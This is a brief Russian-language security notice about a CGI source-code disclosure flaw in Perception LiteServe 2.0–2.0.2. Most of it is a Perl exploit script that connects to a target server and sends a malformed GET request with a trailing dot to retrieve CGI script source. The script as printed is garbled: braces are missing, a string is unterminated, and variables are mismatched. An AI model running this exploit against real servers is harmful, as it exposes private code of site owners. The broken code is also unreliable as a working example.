LiteServe - коммерческий Web, email и FTP сервер. Некорректный web запрос позволяет удаленному атакующему раскрыть исходный код CGI сценария.

Эксплоит: 

#!/usr/bin/perl 

# LS_FETCH.PL 
# By Matthew Murphy 
# LiteServe 2.02 and prior - CGI Disclosure 
# Usage: perl ls_fetch.pl [filename] [host] [alias] [port] 
use IO::Socket; 
use URI::Escape; 

$alias = "cgi-isapi"; # Default LiteServe CGI alias 
$port = 80; 
if (@ARGV < 2 || @ARGV > 4) { 
print STDOUT "Usage: perl $0 [filename] [host] [alias=cgi-isapi] [port=80] 
} else { 
if (@ARGV >= 3) { 
$alias = $ARGV[2]; 

if (@ARGV == 4) { 
$port = $ARGV[3]; 

$filename = $ARGV[1]; 
$host = $ARGV[2]; 
$f = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Proto=>"tcp"); 
$f->autoflush(1); 
$b = sprintf("GET /%s/%s. HTTP/1.0\r\n\r\n", $alias, uri_escape($file)); 
print $f $b; 
while (defined($line=<$f>)) { 
print STDOUT $line; 

undef $f; 

Уязвимость обнаружена в Perception LiteServe 2.0-2.0.2.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии